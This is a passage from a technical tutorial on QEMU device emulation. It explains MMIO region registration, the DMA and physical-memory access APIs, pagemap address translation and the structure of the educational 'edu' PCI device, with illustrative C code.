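static const MemoryRegionOps demo_ops = { demo_read, demo_write };
```

Note that the callbacks receive the offset within the region, not the absolute address, which matches how QEMU invokes MemoryRegionOps.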
Registering IO-type memory
memory_region_init_io
memory_region_init_io() only initializes a MemoryRegion. It does not attach the region to a bus or map it into the guest. To make the region visible, it must still be exported through pci_register_bar(), memory_region_add_subregion(), or a similar call.
void memory_region_init_io(MemoryRegion *mr,
                           Object *owner,
                           const MemoryRegionOps *ops,
                           void *opaque,
                           const char *name,
                           uint64_t size);
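Return value: void (none).
Parameters:
mr: the MemoryRegion instance to initialize (usually a member of the device state structure).
owner: the owning QOM object, typically OBJECT(dev) or OBJECT(&s->pdev.qdev); used for lifetime management and introspection.
ops: the callback table, which defines the read/write functions and related attributes:
typedef struct MemoryRegionOps {
    uint64_t (*read)(void *opaque, hwaddr addr, unsigned size);
    void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size);
    enum device_endian endianness;
} MemoryRegionOps;
opaque: passed through unchanged to the callbacks (a pointer to the device instance, commonly s).
name: a region name that is convenient for debugging and monitoring (for example "strng-mmio").
size: the region size in bytes. QEMU uses it for bounds checking; accesses outside the range never reach your ops.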
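pci_register_bar
pci_register_bar binds memory to BAR region_num in the device's configuration space. Once the guest writes the BAR register and fixes the mapping address, QEMU forwards accesses to ops->read/write. The bounds are enforced by memory->size, so out-of-range accesses never reach the callbacks.
void pci_register_bar(PCIDevice *dev,
                      int region_num,
                      uint8_t type,
                      MemoryRegion *memory);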
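Return value: void (none).
Parameters:
dev: PCIDevice *, your PCI device instance (usually &s->pdev).
region_num: the BAR number, 0..5 (an ordinary device has at most 6 BARs; the ROM is counted separately).
type: a combination of BAR type and flags:
PCI_BASE_ADDRESS_SPACE_MEMORY = 0x00 (memory-mapped, MMIO)
PCI_BASE_ADDRESS_SPACE_IO = 0x01 (I/O ports, PMIO)
The following flags can be ORed in (for memory BARs):
PCI_BASE_ADDRESS_MEM_TYPE_64 (64-bit BAR, which consumes two consecutive BAR slots)
PCI_BASE_ADDRESS_MEM_PREFETCH (prefetchable)
memory: a MemoryRegion already set up with memory_region_init_io(). After registration, guest accesses to the address range of this BAR are routed to the ops of memory.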
Reading and writing IO-type memory
The two prototypes below are the access callbacks for IO-type memory (a device's MMIO/PIO BAR) in QEMU's MemoryRegionOps. Each call answers one bus transaction issued by a guest CPU:
uint64_t (*read)(void *opaque, hwaddr addr, unsigned size);
void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size);
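opaque: the device state pointer you passed to memory_region_init_io(..., &ops, opaque, ...), usually a pointer to the private structure wrapping your DeviceState/PCIDevice. A callback first casts it back to the device structure and then reads or writes registers and state.
addr (type hwaddr): the offset of the access relative to the start of this MemoryRegion (that is, relative to the start of the BAR). It is not a system physical address. hwaddr is an unsigned integer sized for guest address widths and can hold a 64-bit offset.
size (in bytes): the width of this access, one of 1, 2, 4, or 8. Which widths are allowed depends on the valid/impl access-size settings in your MemoryRegionOps; for an unsupported width QEMU either splits the access into several smaller calls or rejects it, depending on your configuration.
data (write callback only): the value to write. Only the low size * 8 bits are meaningful, so mask and align accordingly when writing a device register.
Return value of read: the data read, carried in the low size * 8 bits. Do not sign-extend. Alignment and byte order are determined jointly by the endianness field of MemoryRegionOps and the access width.
Summary: one CPU load/store on a device register is decoded by QEMU into a call to your read/write; you use addr/size to fetch or modify a value in the register space and return or complete.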
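As an illustration of these rules, here is a pair of callbacks with the same signatures, written as standalone C. The register map, the ID value, and the choice to accept only 4-byte accesses are all assumptions made for this sketch; in QEMU the width restriction would normally be expressed through the valid/impl fields rather than checked by hand.

```c
#include <assert.h>
#include <stdint.h>

typedef uint64_t hwaddr;

/* Hypothetical register map, offsets relative to the start of the BAR. */
enum {
    REG_ID         = 0x00,  /* read-only identification value */
    REG_SCRATCH    = 0x04,  /* read/write scratch register */
    REG_IRQ_STATUS = 0x08,  /* read-only pending interrupt bits */
    REG_IRQ_ACK    = 0x0c,  /* write-only: clears the given status bits */
};

typedef struct DemoState {
    uint32_t scratch;
    uint32_t irq_status;
} DemoState;

/* Mask covering the low size * 8 bits. */
static uint64_t size_mask(unsigned size)
{
    return size >= 8 ? ~0ULL : (1ULL << (size * 8)) - 1;
}

static uint64_t demo_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    DemoState *s = opaque;          /* recover the device state */
    uint64_t val = ~0ULL;           /* unknown registers read as all ones */

    if (size == 4) {
        switch (addr) {
        case REG_ID:         val = 0x12345678;    break;
        case REG_SCRATCH:    val = s->scratch;    break;
        case REG_IRQ_STATUS: val = s->irq_status; break;
        }
    }
    return val & size_mask(size);   /* only the low size * 8 bits are returned */
}

static void demo_mmio_write(void *opaque, hwaddr addr, uint64_t data, unsigned size)
{
    DemoState *s = opaque;

    if (size != 4) {
        return;                     /* ignore widths this device does not implement */
    }
    data &= size_mask(size);        /* discard bits above the access width */

    switch (addr) {
    case REG_SCRATCH: s->scratch = (uint32_t)data;      break;
    case REG_IRQ_ACK: s->irq_status &= ~(uint32_t)data; break;
    }
}
```

Writing 0xffffffffdeadbeef with size 4 to REG_SCRATCH stores 0xdeadbeef, because the upper bits lie outside the access width.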
Memory access functions
Generic AddressSpace reads and writes
MemTxResult address_space_read(AddressSpace *as, hwaddr addr,
                               MemTxAttrs attrs, void *buf, size_t len);
MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
                                MemTxAttrs attrs, const void *buf, size_t len);
MemTxResult address_space_rw(AddressSpace *as, hwaddr addr,
                             MemTxAttrs attrs, void *buf, size_t len,
                             bool is_write);
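Parameters
as: the address space to access. Common choices are:
the AddressSpace of system physical memory (for example &address_space_memory);
the I/O address space;
a DMA AddressSpace behind IOMMU translation (for example one created for a particular bus or device).
addr: the starting physical or I/O address within that AddressSpace.
attrs: the transaction attributes (MemTxAttrs); MEMTXATTRS_UNSPECIFIED is the usual choice. They travel with the access so that memory listeners, the IOMMU, and similar subsystems can interpret them (for example the secure/user state of the access or the requester ID; the exact meaning depends on the target architecture and device).
buf / len: the caller's buffer and its length; a read copies the target contents into buf, a write copies from buf to the target.
is_write: address_space_rw() only; true means write, false means read.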
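Return value (error handling)
The functions return a MemTxResult: MEMTX_OK on success; any other value indicates a failure such as an access error, a decode error (address unmapped or rejected), or an error reported by the device.
Practical advice: compare against MEMTX_OK and, on error, set a DMA error bit in the device, raise an interrupt, or do whatever the device specification requires.
When to use
You already know which AddressSpace to access (for example you hold a device's DMA address space) and want to issue reads and writes through one uniform API.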
dma_memory_read / dma_memory_write (preferred when a device issues DMA)
int dma_memory_read(AddressSpace *as, dma_addr_t addr,
                    void *buf, dma_addr_t len);
int dma_memory_write(AddressSpace *as, dma_addr_t addr,
                     const void *buf, dma_addr_t len);

MemTxResult dma_memory_read_with_attrs(AddressSpace *as, dma_addr_t addr,
                                       void *buf, dma_addr_t len,
                                       MemTxAttrs attrs);
MemTxResult dma_memory_write_with_attrs(AddressSpace *as, dma_addr_t addr,
                                        const void *buf, dma_addr_t len,
                                        MemTxAttrs attrs);
Parameters
as: the AddressSpace used for DMA. If the system has an IOMMU, make sure this is the DMA address space behind the IOMMU; otherwise the access bypasses the IOMMU, which does not match real hardware.
addr: the DMA address (the address as seen by the device).
buf / len: as above.
attrs: as above; MEMTXATTRS_UNSPECIFIED is fine for most devices.
Return value
The simple variants return int (0 on success, < 0 on failure); the *_with_attrs variants return MemTxResult.
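DMA (Direct Memory Access) is a mechanism by which a peripheral (a NIC, storage controller, GPU, or other PCIe device) reads or writes data in the guest's memory address space directly, bypassing the CPU.
In a QEMU device model, "the device does DMA" means that your device code actively reads or writes buffers in guest memory, addressed either by guest physical address or, when an IOMMU is present, by I/O virtual address (IOVA).
CPU memory access: a guest CPU executes a load/store, and QEMU resolves the address to RAM or MMIO; an MMIO access calls your MemoryRegionOps.read/write callbacks.
DMA memory access: the device itself initiates a memory transfer (for example, a NIC writing received data into a ring buffer in guest memory). In QEMU this appears as the device model calling dma_memory_read/write (or pci_dma_read/write).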
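PCI-specific: pci_dma_read / pci_dma_write
These two functions let a PCI device issue DMA: the device reads or writes guest memory using an IOVA/DMA address from its own point of view. They pick the correct DMA AddressSpace from dev automatically (taking IOMMU/ATS and similar into account), which is less error-prone than obtaining an AddressSpace yourself.
int pci_dma_read(PCIDevice *dev, dma_addr_t addr, void *buf, dma_addr_t len);
int pci_dma_write(PCIDevice *dev, dma_addr_t addr, const void *buf, dma_addr_t len);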
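Parameters
dev: the PCIDevice * issuing the DMA (your device object).
addr: a dma_addr_t, the DMA address as seen by the device (usually an IOVA; without an IOMMU it equals the guest physical address).
buf: a host-side buffer pointer.
pci_dma_read: output buffer (guest memory is read into it).
pci_dma_write: input buffer (its contents are written to guest memory).
len: the number of bytes to transfer (typed dma_addr_t so that 64-bit lengths are supported).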
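Return value
0: the whole transfer succeeded (equivalent to the underlying MemTxResult being MEMTX_OK).
Non-zero (usually -1): the transfer failed (the underlying result was not MEMTX_OK).
errno is not guaranteed to be set; do not rely on it.
Possible causes of failure: IOMMU translation failure or permission denial, an unmapped address (decode error), an error reported by the target MemoryRegion, an out-of-range access, and so on.
There is no "partial success" result: either all len bytes are transferred or the call fails. If you need partial-length semantics, use a loop around address_space_map/unmap instead, or split the transfer into smaller chunks and retry them individually.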
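Characteristics
The correct DMA AddressSpace is selected from dev (taking IOMMU/ATS and similar into account), so you cannot pick the wrong one by hand.
The semantics are equivalent to dma_memory_*, but the interface is closer to the common case of a PCI device issuing DMA.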
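The all-or-nothing contract and the recommended error handling can be sketched as follows. This is a standalone model, not QEMU's implementation: guest memory is a single host buffer (`GuestRam`), there is no IOMMU, and `demo_dma_read`, `demo_dma_write`, `demo_dev_copy`, and `DEMO_STATUS_DMA_ERR` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef uint64_t dma_addr_t;

/* Stand-in for guest memory: one contiguous window backed by a host buffer. */
typedef struct GuestRam {
    uint8_t *host;
    dma_addr_t base;
    dma_addr_t size;
} GuestRam;

/* True if [addr, addr + len) lies entirely inside the window (no overflow). */
static int dma_range_ok(const GuestRam *ram, dma_addr_t addr, dma_addr_t len)
{
    return addr >= ram->base && len <= ram->size &&
           addr - ram->base <= ram->size - len;
}

/* Both helpers return 0 on success and -1 on failure, never a partial count. */
static int demo_dma_read(GuestRam *ram, dma_addr_t addr, void *buf, dma_addr_t len)
{
    if (!dma_range_ok(ram, addr, len)) return -1;
    memcpy(buf, ram->host + (addr - ram->base), len);
    return 0;
}

static int demo_dma_write(GuestRam *ram, dma_addr_t addr, const void *buf, dma_addr_t len)
{
    if (!dma_range_ok(ram, addr, len)) return -1;   /* nothing is written on failure */
    memcpy(ram->host + (addr - ram->base), buf, len);
    return 0;
}

#define DEMO_STATUS_DMA_ERR 0x1

typedef struct DemoDev {
    GuestRam *ram;
    uint32_t status;
    uint8_t buf[64];            /* device-internal bounce buffer */
} DemoDev;

/* Device operation: copy len bytes from src to dst in guest memory via DMA. */
static void demo_dev_copy(DemoDev *d, dma_addr_t src, dma_addr_t dst, dma_addr_t len)
{
    if (len > sizeof(d->buf) ||
        demo_dma_read(d->ram, src, d->buf, len) != 0 ||
        demo_dma_write(d->ram, dst, d->buf, len) != 0) {
        d->status |= DEMO_STATUS_DMA_ERR;   /* report the failure to the guest */
    }
}
```

Checking the range with subtraction rather than computing `addr + len` avoids wrap-around when the guest supplies a huge address or length, which matters because both values are guest-controlled.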
Some QEMU versions additionally provide pci_dma_* variants that take a MemTxAttrs argument and return a MemTxResult:
MemTxResult pci_dma_read_with_attrs(PCIDevice *dev, dma_addr_t addr,
                                    void *buf, dma_addr_t len,
                                    MemTxAttrs attrs);
MemTxResult pci_dma_write_with_attrs(PCIDevice *dev, dma_addr_t addr,
                                     const void *buf, dma_addr_t len,
                                     MemTxAttrs attrs);
For this form of the API the return value is a MemTxResult, with MEMTX_OK meaning success.
cpu_physical_memory_*
The cpu_physical_memory_* helpers access the guest's system physical memory address space (system_memory) directly, from a "god's-eye view".
They do not go through the IOMMU, perform no device permission checks, and do not trigger device MMIO callbacks.
Typical uses: the monitor, debugging, firmware loading, snapshot tools, and other cases where the host side actively reads or writes guest physical memory.
Do not use them inside a device model to emulate DMA or register accesses, since that deviates from the real hardware path.
void cpu_physical_memory_read(hwaddr addr, void *buf, size_t len);
void cpu_physical_memory_write(hwaddr addr, const void *buf, size_t len);
void cpu_physical_memory_rw(hwaddr addr, void *buf, size_t len, int is_write);
void *cpu_physical_memory_map(hwaddr addr, hwaddr *plen, int is_write);
void cpu_physical_memory_unmap(void *host_ptr, hwaddr len, int is_write,
                               hwaddr access_len);
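Parameters
addr: hwaddr, the target guest physical address (a physical address in system_memory; not an IOVA and not a virtual address).
buf: void * / const void *, a host-side buffer pointer. It is an output buffer for read and rw(is_write=0), and an input buffer for write and rw(is_write=1).
len: size_t, the number of bytes to read or write. It may be large; the function handles page and region boundaries internally, piece by piece.
is_write: int (rw only); 0 means read, non-zero means write.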
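Return value and error behavior
The read/write/rw functions return nothing and do not report errors through a return code.
When an access hits an unmapped or rejected area, the usual behavior (it varies by version and code path) is:
Read: the affected bytes are treated as 0 (zeros are copied into that part of buf);
Write: the affected part of the write is dropped (as if it had not been written).
They are therefore fine for debugging and loading, but do not use them to decide whether an access really succeeded, and do not use them to emulate device behavior.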
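Memory address translation
On Linux, a sufficiently privileged user-space process can use /proc/<pid>/pagemap to find the physical address behind a virtual address.
The pagemap interface maps each virtual page of a process to a page frame number (PFN), from which the physical address follows:
physical address = PFN × page size + offset within the page.
Since Linux 4.0 the PFN is hidden from processes without CAP_SYS_ADMIN, as a defense against Rowhammer-style attacks: in 4.0 and 4.1 an unprivileged open fails outright, and from 4.2 on the PFN field reads as zero. You therefore need to run as root or grant the program that capability; otherwise no PFN is available.
The bits of a 64-bit pagemap entry (simplified) are:
bit 63 = present,
bit 62 = swapped,
bits 0–54 = PFN (valid when present)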
A virtual address can be translated to a physical address as follows:
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <errno.h>

/* Translate a virtual address of the calling process to a physical address.
 * Returns 0 on failure. */
static uint64_t virt_to_phys(void *vaddr)
{
    long pagesize = sysconf(_SC_PAGESIZE);
    uint64_t va = (uint64_t)(uintptr_t)vaddr;
    uint64_t page_index = va / pagesize;
    uint64_t offset = page_index * sizeof(uint64_t);  /* one 64-bit entry per page */

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) return 0;

    uint64_t entry = 0;
    ssize_t n = pread(fd, &entry, sizeof(entry), offset);
    close(fd);
    if (n != sizeof(entry)) return 0;

    /* bit 63: present, bit 62: swapped */
    if (!(entry & (1ULL << 63)) || (entry & (1ULL << 62))) {
        errno = EFAULT;
        return 0;
    }

    uint64_t pfn = entry & ((1ULL << 55) - 1);        /* bits 0-54 */
    return (pfn * pagesize) + (va % pagesize);
}
The steps are:
Make sure the page is resident (otherwise present = 0): touch the address once or lock it into memory with mlock().
Open /proc/self/pagemap (or /proc/<pid>/pagemap) and read one 64-bit entry at offset "page index × 8"; both the offset and the read size must be multiples of 8.
Check bit 63 (present). If the page is not in memory, or bit 62 (swapped) is 1, the current physical address cannot be obtained.
Extract the PFN (the low 55 bits of the entry).
Compute the physical address: phys = (PFN << PAGE_SHIFT) | (va & (page_size-1)).
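The arithmetic in these steps can be checked without root privileges by decoding a hand-made entry. The sketch below factors the bit tests into a pure function; `pagemap_offset` and `pagemap_entry_to_phys` are hypothetical helper names, the page size is assumed to be a power of two, and a PFN of zero is treated as "hidden" on the assumption that the caller lacks CAP_SYS_ADMIN.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PM_PRESENT  (1ULL << 63)            /* page is in RAM */
#define PM_SWAPPED  (1ULL << 62)            /* page is in swap */
#define PM_PFN_MASK ((1ULL << 55) - 1)      /* bits 0-54 */

/* File offset of the pagemap entry that describes virtual address va. */
static uint64_t pagemap_offset(uint64_t va, uint64_t page_size)
{
    return (va / page_size) * sizeof(uint64_t);
}

/* Decode one pagemap entry. Returns true and stores the physical address
 * in *phys if the page is present and its PFN is visible. */
static bool pagemap_entry_to_phys(uint64_t entry, uint64_t va,
                                  uint64_t page_size, uint64_t *phys)
{
    if (!(entry & PM_PRESENT) || (entry & PM_SWAPPED)) {
        return false;
    }
    uint64_t pfn = entry & PM_PFN_MASK;
    if (pfn == 0) {
        return false;           /* PFN hidden from unprivileged readers */
    }
    *phys = pfn * page_size + (va & (page_size - 1));
    return true;
}
```

For example, with 4 KiB pages, an entry with the present bit set and PFN 0x12345, and a virtual address whose low 12 bits are 0xabc, the result is 0x12345 × 0x1000 + 0xabc = 0x12345abc.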
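mmap by itself does not allocate physical pages immediately. Linux allocates on demand: a physical page is only assigned when the first access triggers a page fault. Anonymous pages obtained from a plain mmap therefore have no physical address to report in /proc/self/pagemap until they have been touched.
Passing MAP_POPULATE to mmap ("pre-faulting")
For a writable, private, anonymous mapping (the typical combination MAP_PRIVATE|MAP_ANONYMOUS with PROT_READ|PROT_WRITE), Linux handles MAP_POPULATE by taking the write-fault pre-faulting path: every page is faulted in ahead of time as if it had been written, so each page gets its own anonymous physical page.
#include <sys/mman.h>
void *p = mmap(NULL, len, PROT_READ|PROT_WRITE,
               MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);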
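One way to observe the effect without reading pagemap is mincore(2), which reports per-page residency. The following is a Linux-only sketch; `map_populated` and `count_resident_pages` are hypothetical helpers, and because MAP_POPULATE is best-effort, full residency is expected on an idle system but is not strictly guaranteed.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE             /* for MAP_ANONYMOUS, MAP_POPULATE, mincore */
#endif
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map len bytes of private anonymous memory and pre-fault every page.
 * Returns NULL on failure. */
static void *map_populated(size_t len)
{
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Count the resident pages in [p, p + len); p must be page-aligned.
 * Returns -1 on error. */
static long count_resident_pages(void *p, size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t npages = (len + page - 1) / page;
    unsigned char *vec = malloc(npages);
    if (!vec) return -1;

    long resident = -1;
    if (mincore(p, len, vec) == 0) {
        resident = 0;
        for (size_t i = 0; i < npages; i++) {
            resident += vec[i] & 1;     /* bit 0 set: page is resident */
        }
    }
    free(vec);
    return resident;
}
```

For a 16-page mapping created by `map_populated`, `count_resident_pages` is expected to return 16 right away, whereas the same mapping without MAP_POPULATE would typically report 0 until the pages are touched.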
QEMU device analysis
PCI devices
Device instance definition
First comes the device's State structure. It is the device's own part of the Object and contains every structure the device defines for itself. All operations on the device revolve around this structure.
#define TYPE_PCI_EDU_DEVICE "edu"
#define EDU(obj)        OBJECT_CHECK(EduState, obj, TYPE_PCI_EDU_DEVICE)

#define FACT_IRQ        0x00000001
#define DMA_IRQ         0x00000100

#define DMA_START       0x40000
#define DMA_SIZE        4096

typedef struct {
    PCIDevice pdev;
    MemoryRegion mmio;

    QemuThread thread;
    QemuMutex thr_mutex;
    QemuCond thr_cond;
    bool stopping;

    uint32_t addr4;
    uint32_t fact;
#define EDU_STATUS_COMPUTING    0x01
#define EDU_STATUS_IRQFACT      0x80
    uint32_t status;

    uint32_t irq_status;

#define EDU_DMA_RUN             0x1
#define EDU_DMA_DIR(cmd)        (((cmd) & 0x2) >> 1)
# define EDU_DMA_FROM_PCI       0
# define EDU_DMA_TO_PCI         1
#define EDU_DMA_IRQ             0x4
    struct dma_state {
        dma_addr_t src;
        dma_addr_t dst;
        dma_addr_t cnt;
        dma_addr_t cmd;
    } dma;
    QEMUTimer dma_timer;
    char dma_buf[DMA_SIZE];
    uint64_t dma_mask;
} EduState;
Device type definition
Next comes the device's TypeInfo. Pay particular attention to its initialization functions, instance_init and class_init.
static void pci_edu_register_types(void)
{
    static InterfaceInfo interfaces[] = {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo edu_info = {
        .name          = TYPE_PCI_EDU_DEVICE,
        .parent        = TYPE_PCI_DEVICE,
        .instance_size = sizeof(EduState),
        .instance_init = edu_instance_init,
        .class_init    = edu_class_init,
        .interfaces    = interfaces,
    };

    type_register_static(&edu_info);
}
type_init(pci_edu_register_types)
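instance_size tells QOM how much memory to allocate when creating the object (that is, the size of EduState).
class_init sets default callbacks at the class level (for example, pointing PCIDeviceClass::realize at pci_edu_realize).
instance_init sets field defaults and registers QOM properties at the instance level (it must not fail).

When you pass -device edu on the command line, or create the device from code, QEMU will:
allocate a zeroed block of sizeof(EduState) bytes;
construct the parent-class sub-object (the first member of EduState is PCIDevice pdev;, which is what "embedded inheritance" means);
call edu_instance_init() to set instance field defaults and register properties such as dma_mask.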
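The three steps above can be sketched with a toy model in plain C. None of the `Toy*` names below exist in QEMU; they only imitate the idea that a type record carries `instance_size` and `instance_init`, and that a child struct embeds its parent as the first member so a pointer to one is also a valid pointer to the other.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical stand-ins for PCIDevice / EduState, not QEMU's real types. */
typedef struct ToyParent {
    uint32_t vendor_id;
} ToyParent;

typedef struct ToyChild {
    ToyParent parent;       /* embedded inheritance: must be the first member */
    uint64_t dma_mask;
} ToyChild;

typedef struct ToyTypeInfo {
    size_t instance_size;
    void (*instance_init)(void *obj);
} ToyTypeInfo;

static void toy_child_init(void *obj)
{
    ToyChild *c = obj;
    c->dma_mask = (1ULL << 28) - 1;   /* same default edu_instance_init uses */
}

/* Allocate zeroed storage of instance_size bytes, then run instance_init. */
static void *toy_object_new(const ToyTypeInfo *ti)
{
    assert(ti != NULL && ti->instance_size > 0);
    void *obj = calloc(1, ti->instance_size);
    if (obj && ti->instance_init) {
        ti->instance_init(obj);
    }
    return obj;
}

static const ToyTypeInfo toy_child_info = {
    .instance_size = sizeof(ToyChild),
    .instance_init = toy_child_init,
};
```

Because `parent` sits at offset 0, casting a `ToyChild *` to `ToyParent *` yields the embedded parent, which is the same trick the EDU() and PCI_DEVICE() cast macros depend on.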
Device initialization

The class_init and instance_init hooks, together with the other initialization functions, tell us most of what we need to know about a device. The realize and exit functions define part of the object's setup and teardown.

```c
static void edu_instance_init(Object *obj)
{
    EduState *edu = EDU(obj);

    /* Default DMA mask: 28 address bits. */
    edu->dma_mask = (1UL << 28) - 1;
    object_property_add_uint64_ptr(obj, "dma_mask",
                                   &edu->dma_mask, OBJ_PROP_FLAG_READWRITE,
                                   NULL);
}

static void edu_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_edu_realize;
    k->exit = pci_edu_uninit;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0x11e8;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}
```
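realize holds the setup steps that are allowed to fail, and exit undoes them when the device is destroyed.

class_init (class initialization, ObjectClass level): sets the class's default virtual functions and callbacks (for example, pointing DeviceClass::realize at your implementation) and does not touch instance data. No object exists yet.
Set or override virtual functions and class fields: dc->realize, dc->unrealize, desc, user_creatable, and so on.
Install the static property array (device_class_set_props() stores it in DeviceClass.props_).

instance_init (instance initialization, Object instance level, must not fail): after the object is created, set instance field defaults, create the "shells" of child objects (object_initialize), register QOM properties, and so on. It cannot fail. At this point the device is not attached to a bus and does not claim global resources.
Set instance defaults;
Register QOM properties with object_property_add*() (this is what makes them visible and settable through -device xyz,help and device-list-properties);
Create the shells of child objects with object_initialize() (note: child objects are not realized here).

realize (may fail): plugs the instance into the system. It validates the properties the user has set, registers on the bus, maps BAR/MMIO, wires up IRQs, and acquires resources whose acquisition can fail. Failures are reported through errp. The optional unrealize undoes all of this.
Validate based on the properties;
Attach to the bus, allocate and register BAR/MMIO/PIO, wire IRQs, and realize child objects one by one;
Acquire any external resource that may fail; report errors through Error **errp when necessary.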
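The split between "must not fail" and "may fail" can be sketched without QEMU at all. In the toy below, `ToyDev`, `toy_instance_init`, `toy_realize` and `toy_unrealize` are illustrative names only, and the `const char **errp` parameter merely imitates the role of QEMU's `Error **errp`.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct ToyDev {
    unsigned bar_size;      /* stands in for a user-settable property */
    bool realized;
} ToyDev;

/* instance_init: defaults only, nothing here is allowed to fail. */
static void toy_instance_init(ToyDev *d)
{
    d->bar_size = 0x100;
    d->realized = false;
}

/* realize: validate properties and claim resources; may fail.
 * On failure *errp receives a message and the device stays unrealized. */
static bool toy_realize(ToyDev *d, const char **errp)
{
    assert(errp != NULL);
    /* PCI BAR sizes must be a non-zero power of two. */
    if (d->bar_size == 0 || (d->bar_size & (d->bar_size - 1)) != 0) {
        *errp = "bar_size must be a non-zero power of two";
        return false;
    }
    d->realized = true;
    return true;
}

/* unrealize: undo whatever realize did. */
static void toy_unrealize(ToyDev *d)
{
    d->realized = false;
}
```

The point of the ordering is that a property set between instance_init and realize (here, `bar_size`) is only validated in realize, where an error can still be reported to the user.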
Device memory is mostly registered in realize. In edu, for example, memory_region_init_io and pci_register_bar register a region of MMIO memory. The MemoryRegionOps structure edu_mmio_ops deserves particular attention.

```c
static void pci_edu_realize(PCIDevice *pdev, Error **errp)
{
    EduState *edu = EDU(pdev);
    uint8_t *pci_conf = pdev->config;

    pci_config_set_interrupt_pin(pci_conf, 1);

    /* MSI setup can fail, so it is done first and reported through errp. */
    if (msi_init(pdev, 0, 1, true, false, errp)) {
        return;
    }

    timer_init_ms(&edu->dma_timer, QEMU_CLOCK_VIRTUAL, edu_dma_timer, edu);

    qemu_mutex_init(&edu->thr_mutex);
    qemu_cond_init(&edu->thr_cond);
    qemu_thread_create(&edu->thread, "edu", edu_fact_thread,
                       edu, QEMU_THREAD_JOINABLE);

    /* 1 MiB MMIO region exposed as BAR0. */
    memory_region_init_io(&edu->mmio, OBJECT(edu), &edu_mmio_ops, edu,
                          "edu-mmio", 1 * MiB);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &edu->mmio);
}

static void pci_edu_uninit(PCIDevice *pdev)
{
    EduState *edu = EDU(pdev);

    /* Ask the worker thread to stop, then wait for it. */
    qemu_mutex_lock(&edu->thr_mutex);
    edu->stopping = true;
    qemu_mutex_unlock(&edu->thr_mutex);
    qemu_cond_signal(&edu->thr_cond);
    qemu_thread_join(&edu->thread);

    qemu_cond_destroy(&edu->thr_cond);
    qemu_mutex_destroy(&edu->thr_mutex);

    timer_del(&edu->dma_timer);
    msi_uninit(pdev);
}
```
edu_mmio_ops is defined as follows; it names the edu device's own read and write handlers, edu_mmio_read and edu_mmio_write.

```c
static const MemoryRegionOps edu_mmio_ops = {
    .read = edu_mmio_read,
    .write = edu_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {                  /* access sizes the guest may use */
        .min_access_size = 4,
        .max_access_size = 8,
    },
    .impl = {                   /* access sizes the handlers implement */
        .min_access_size = 4,
        .max_access_size = 8,
    },
};
```
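As a rough picture of what the region size and the `.valid` sizes do, the toy dispatcher below rejects accesses before they ever reach the device handler. It is a simplified sketch with invented `Toy*` names; QEMU's real checks live in functions such as memory_region_access_valid() and access_with_adjusted_size() and cover more cases (alignment, splitting, endianness).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ToyOps {
    uint64_t (*read)(void *opaque, uint64_t addr, unsigned size);
    unsigned min_access_size;
    unsigned max_access_size;
} ToyOps;

typedef struct ToyRegion {
    const ToyOps *ops;
    void *opaque;
    uint64_t size;          /* region length in bytes, like a BAR size */
} ToyRegion;

/* An access is forwarded only if its size is allowed and it lies
 * entirely inside the region. */
static bool toy_access_ok(const ToyRegion *mr, uint64_t addr, unsigned size)
{
    return size >= mr->ops->min_access_size &&
           size <= mr->ops->max_access_size &&
           addr < mr->size && size <= mr->size - addr;
}

static bool toy_dispatch_read(const ToyRegion *mr, uint64_t addr,
                              unsigned size, uint64_t *out)
{
    assert(out != NULL);
    if (!toy_access_ok(mr, addr, size)) {
        return false;
    }
    *out = mr->ops->read(mr->opaque, addr, size);
    return true;
}

/* Example handler: a bank of 32-bit registers. */
static uint64_t toy_regs_read(void *opaque, uint64_t addr, unsigned size)
{
    const uint32_t *regs = opaque;
    (void)size;
    return regs[addr >> 2];
}
```

The handler itself never checks `addr`; it relies on the dispatcher to keep accesses inside the region, which is exactly the kind of assumption that breaks when a device computes an index from guest-controlled state instead of from `addr`.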
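QEMUTimer

QEMUTimer is the software timer object of QEMU's event loop. It hangs off a QEMUClock and, when that clock's timeline reaches the deadline, calls back into your handler. Devices use it to drive timeouts, periodic interrupts, and similar logic.

QEMU has four timelines, and you pick one when creating a timer: realtime (a monotonic host clock that keeps running while the VM is stopped), host (host wall-clock time, which can jump when the host's time is changed), virtual (advances only while the guest is running), and virtual_rt (identical to virtual outside icount mode; in icount mode it counts real nanoseconds while the VM is running). Device models generally use virtual because it stops together with the VM on pause or at a breakpoint, which keeps behavior deterministic.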
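The "advances only while the guest is running" behavior can be modelled with a few lines of arithmetic. The sketch below is a toy, not QEMU's implementation: `ToyVirtualClock` and its functions are invented names, and the host time is passed in by the caller (for instance a monotonic clock reading) so the example stays deterministic.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef struct ToyVirtualClock {
    int64_t offset_ns;      /* host time subtracted while running */
    int64_t frozen_ns;      /* value reported while stopped */
    bool running;
} ToyVirtualClock;

/* Current virtual time for a given host timestamp. */
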